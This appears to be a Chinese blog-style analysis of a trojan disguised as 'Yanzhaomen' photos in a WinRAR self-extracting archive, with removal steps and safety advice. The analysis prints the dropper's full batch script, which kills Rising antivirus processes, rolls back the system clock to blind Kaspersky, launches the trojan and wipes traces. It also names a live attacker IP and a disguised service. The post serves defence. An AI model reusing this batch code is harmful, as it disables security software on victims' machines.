解密：“燕赵门”背后三大陷阱---病毒+木马!!

Gestapo

解密：“燕赵门”背后三大陷阱　　测试环境 　　虚拟机系统：windows xp2 　　下载软件：迅雷
　　杀毒软件：瑞星2008(打了最新补丁包) 　　一、中招过程
　　朋友好奇，寻找燕赵门图片。在百度某贴吧中看到一条信息，提供燕赵下载，并且给出了链接地址“http: //guilin123.*.com/yanmenzhao.rar”于是迫不及待地用迅雷下载，下载的过程中“迅雷安全中心”弹出病毒威胁警告对话框，由于是测试忽略，点击“继续下载”。(图1) 　　
　　 　　为了测试，笔者的迅雷设置了“下载完成后杀毒”。下载完成后，瑞星病毒扫描后提示“发现2个病毒，清除失败!”(图2)
　　 　　
　　二、病毒分析 　　下载完成的这个名称为yanmenzhao，大小为1.04M文件是个压缩文件，后缀为rar。右键单击选择“解压到yanmenzhao下”，解压后为yanmenzhao.exe，其后缀为exe，这是个自动解压文件，估计攻击者一定在其中做了文章。(图3)
　　 　　
　　这时千万不能直接双击打开，打开后一定会运行自解压脚本就会中招。先打开WinRAR压缩软件，然后通过“文件”→“打开压缩文件”来打开 yuanmenzhao.exe，果然在其下有两个文件：燕赵门.rar、ymz.exe。第一个文件应该就是图片压缩包，而第二个就是木马压缩文件。同时在WinRAR的右侧窗格中发现如下代码：(图4) 　　
　　 　　Path=%systemroot%
　　Setup=ymz.exe 　　Presetup=燕赵门.rar
　　Silent=1 　　Overwrite=1
　　解释如下： 　　第一行是文件的解压路径，在系统根目录下;
　　第二页是解压后自动运行ymz.exe; 　　第三行是在解压之前先解压燕赵门.rar，达到掩人耳目，看不到ymz.exe文件，其实它已经运行了;
　　第四行是隐藏文件，达到更隐蔽; 　　第五行是覆盖目录下的同名文件，以容错更可靠。
　　用同样的方法在WinRAR中解压ymz.exe，发现下面5个文件：(图5) 　　
　　 　　1.bat
　　1.exe 　　1.vbs
　　knlps.exe 　　knlps.sys
　　同样在右边有自解压脚本代码： 　　Path=%systemroot%\temp
　　SavePath 　　Setup=1.vbs
　　Silent=1 　　Overwrite=1
　　原理好上面的一样，只不过是解压到系统临时目录下。 　　用记事本打开1.vbs分析，代码如下：
　　CreateObject("WScript.Shell").Run "cmd /c 1.bat",0 　　很明显，是调用1.bat文件。
　　用记事本打开1.bat文件，代码及其解释如下： 　　@ECHO OFF
　　knlps.exe -l >PID.txt 　　FINDSTR /i "RavMon.exe" PID.TXT >>RAV.txt
　　FINDSTR /i "RavMonD.exe" PID.TXT >>RAV.txt 　　FINDSTR /i "CCenter.exe" PID.TXT >>RAV.txt
　　FOR /F "eol=; tokens=1 delims= " %%1 in (RAV.txt) do knlps.exe -k %%1 　　上述代码是获取瑞星组件的进程ID并通过knlps.exe结束瑞星的进程。
　　set date=%date% 　　date 1990-01-01
　　date 1990-01-01 　　上述代码是修改系统时间使卡巴监控失效，这句是关键破卡巴查杀的程序流，没这句被杀木马就会被杀。
　　@echo off & setlocal enableextensions 　　echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
　　set /a i = 15 　　:Timeout
　　if %i% == 0 goto Next 　　setlocal
　　set /a i = %i% - 1 　　cscript //nologo %temp%.\tmp$$$.vbs
　　goto Timeout 　　goto End
　　上述代码是倒计时等待15秒 　　:Next
　　%systemroot%\temp\1.exe 这个是你木马的名称 　　for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
　　上述代码第二回行就木马名称的解压目录，第三行行是倒计时等待结束后运行木马并删除。 　　date 2007-10-27 aaa
　　date %date% aaa 　　上述代码是恢复系统时间(卡巴监控)
　　RD /S /Q %systemroot%\temp\ 　　上述代码的含义是删除临时文件清除痕迹。
　　从上面的分析可以看出该自解压包木马的运行机制是，先通过脚本终结瑞星和卡巴斯基，然后运行真正的木马程序，即1.exe，最后清除痕迹。 　　三、运行病毒
　　1、瑞星被终结 　　分析完毕，然后双击yanmenzhao.exe看看中毒症状。为了分析病毒的运行状况，事先打开了瑞星的“实时监控”和“任务管理器”，以观察病毒运行状态。运行后瑞星没有任何提示，任务栏中的瑞星实时监控图标消失，看来瑞星被终结了。另外，在任务管理中出现了一个cscript.exe进程见图 6，很快地闪动，鼠标无法选择结束，大概几秒钟后该进程消失，在进程管理器中有多了2个svchost.exe进程见图7。(笔者在测试前备份了进程表，以前的为5个，多了2个)(图6)(图7)
　　 　　
　　 　　
　　2、可疑的网络连接 　　在命令提示符下敲入命令：
　　netstat -ano 　　查看网络端口连接情况，果然发现了两个可疑IP地址的端口连接：(图8)
　　 　　
　　TCP 192.168.131.72:1098 116.20.215.181:8008 ESTABLISHED 1916 　　TCP 192.168.131.72:1099 116.20.215.181:2630 ESTABLISHED 424
　　这两个连接正好是刚才创建的两个svchost.exe进程创建的。其中的IP 116.20.215.181应该是攻击者的IP或者是一个中转IP。打开www.ip 　　138.com查询，得知是广东省佛山市电信。(图9)
　　 　　
　　四、清除病毒 　　1、结束进程
　　在结束进程的发现这两个svchost.exe进程之间互相保护，当结束了其中的一个，另一个马上会重新新建一个。因此手工结束速度太慢，通过批处理命令来清除： 　　把如下代码保存为kill.bat，双击即可。
　　@echo off 　　taskkill /f /pid 1916
　　taskkill /f /pid 424 　　exit
　　提示：其中的pid是随机的，一定要找到可疑的svchost.exe进程的pid，如果结束了系统启动的svchost.exe的话，系统就会关机或者重启。确定的方法，可以参考图8。 　　2、删除服务
　　运行services.msc打开“服务”工具，通过分析发现了一个可疑的服务项。 　　服务名称为：Workstain
　　显示名称：qmijiu 　　描述：Wicrosoft .NET Framework TPM
　　可执行文件路径：c:\WINDOWS\system32\svchost.exe -k Workstain 　　启动类型:自动
　　服务状态：已启动 　　评析：该服务项和Workstation非常相似，并且描述极具欺骗性，攻击者非常狡猾。(图10)
　　 　　
　　提示：在禁用服务的过程中发现，如果不先结束两个svchost.exe进程，发现根本无法禁用，当你选择禁用该服务，点击确定，它马上改为“自动”运行，可见这也是进程保护在作怪。因此必须把两个进程结束掉再禁止服务。最彻底的是用命令把该服务删除，命令为：　 　　sc delete qmijiu
　　3、文件删除 　　(1)C:\WINDOWS目录下的(图11)
　　 　　
　　燕赵门.rar 　　ymz.exe
　　(1)C:\WINDOWS\system32目录下的(图12) 　　
　　 　　Workstain.drv
　　Sharing.dll 　　总结：该木马病毒利用大众的猎奇心理，把木马和图片打包在一起，然后通过WinRAR的自解压功能使得木马得以运行。其原理比较简单，但象朋友这样的人却屡屡中招。这例“燕赵门”木马病毒给我们的启示是：
　　1、做好自律，不去猎奇浏览不雅的东西; 　　2、在系统中要设置显示文件的后缀，这样可以通过文件后缀就可以判断文件的类型。
　　3、对自解压文件要非常小心，千万不要直接打开，应该选择用winRAR软件打开，看看有没有可疑的脚本和程序。总之，在思想上和技术上都做好准备，不要成为“燕赵门”木马病毒的下一个受害者。